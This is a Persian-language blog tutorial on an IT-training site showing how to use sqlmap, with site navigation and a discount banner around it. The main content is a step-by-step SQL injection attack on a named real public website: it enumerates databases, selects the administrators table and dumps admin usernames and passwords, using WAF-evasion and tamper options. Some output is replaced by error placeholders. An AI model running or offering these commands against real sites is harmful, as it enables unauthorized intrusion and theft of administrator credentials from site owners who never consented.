درخواست های ارتباط
جستجو
لیست دوستان من
صندوق پیام
همه را دیدم
  • در حال دریافت لیست پیام ها
صندوق پیام
رویدادها
همه را دیدم
  • در حال دریافت لیست رویدادها
همه رویدادهای من

جهت دریافت مدرک با مراجعه به به این بخش و ورود به دوره مورد نظر، بر روی گزینه دریافت مدرک کلیک کرده، اطلاعات خود را تکمیل کنید تا پروسه صدور مدرک برای شما طی شود.

صدور مدرک تنها برای دوره هایی که به صورت کامل خریداری شده و قیمت آن ها بالای 100،000 تومان باشد انجام خواهد شد.

جشنواره تخفیف شگفت انگیز زمستانه توسینسو

تا سقف 70 درصد تخفیف + ترافیک نیم بها برای پنج خرید اول هر محصول + پشتیبانی محصولات توسط اساتید + ارائه گواهینامه پایان دوره

تخفیف های وب سایت
همه تخفیف ها

عضویت در

کانال تلگرام

توسینسو

اطلاعات مطلب
مدرس/نویسنده
محمد ولی الهی
امتیاز: 191
رتبه:703
0
4
0
11
تاریخ 16 ماه قبل
نظرات 0
بازدیدها 259
آموزش کار با sqlmap


خب اول از همه‌ باید گفت که این برنامه در

سیستم عامل لینوکس قرار دارد❗️❗️

💢خب بریم سراغ آموزش💢

اول Terminal رو باز میکنیم

بعد در آن تایپ میکنیم sqlmap

برنامه بالا میاد و میبنید که به صورت کامندی

هستش❗️(متنی)

خب ما یه تارگت داریم اول یه نکته درباره ی

این تارگت بگم ...

این تارگت پابلیک شده ...و چون صفحه که

صفحه ادمین رو کسی نتونسته پیدا کنه

همینجوری مونده📌

Target: http://www.bible-history.com/subcat.php?id=2

حالا باید دستور رو وارد کنیم.❗️توجه کنید❗️

اول باید بنویسیم:

sqlmap -u http://www.bible-history.com/subcat.php?id=2 --dbs

در بالا -u به معنای url و --dbs به

معنای دسترسی به دیتابیس هستش

خب چیزهای پیچیده تر هم هست مثلا:

sqlmap -u http://www.bible
-history.com/subcat.php?id=2 —level 5 —risk 3 -v 3 —thread 10 —dbms=mysql —identify-waf —tamper between.py —random-agent —dbs —batch



حالا چند تا کلمه مثلا :
*] bible_glossary
[*] bible_history
[*] information_schema
[*] keywords
[*] kidsdict

اینجا باید چیزهایی که به ادمین مربوط میشه

رو انتخاب کرد (bible_history)

خب نحوه وارد کردن دستورش چجوریه

sqlmap -u http://www.bible-history.com/subcat.php?id=2 -D
bible_history --tables

حالا وقتی این دستور رو زدید یه سری چیزا

مثل:
Emails
administrators
| bh_addform
..........

خب قطعا معلومه که باید کدوم رو انتخاب

کنیم(administrators)

خب حالا دستور بعدی چیه؟☹️

sqlmap -u http://www.bible-history.com/subcat.php?id=2 -D
bible_history -T administrators --columns

و اینجا چیزهایی مثل :

+------------------+-------------+

متن دارای اشکال می باشد


+------------------+-------------+

متن دارای اشکال می باشد


متن دارای اشکال می باشد


متن دارای اشکال می باشد


متن دارای اشکال می باشد


متن دارای اشکال می باشد


+------------------+-------------+

میاره حالا شما دستور
sqlmap -u http://www.bible-history.com/subcat.php?id=2 -D
biblehistory -T administrators -C adminusername,admin_password --dump

خب حالا میبینید که user و password

سایت رو بهتون نشون میده
برچسب ها
مطالب مرتبط

در حال دریافت اطلاعات

نظرات
هیچ نظری ارسال نشده است

    برای ارسال نظر ابتدا به سایت وارد شوید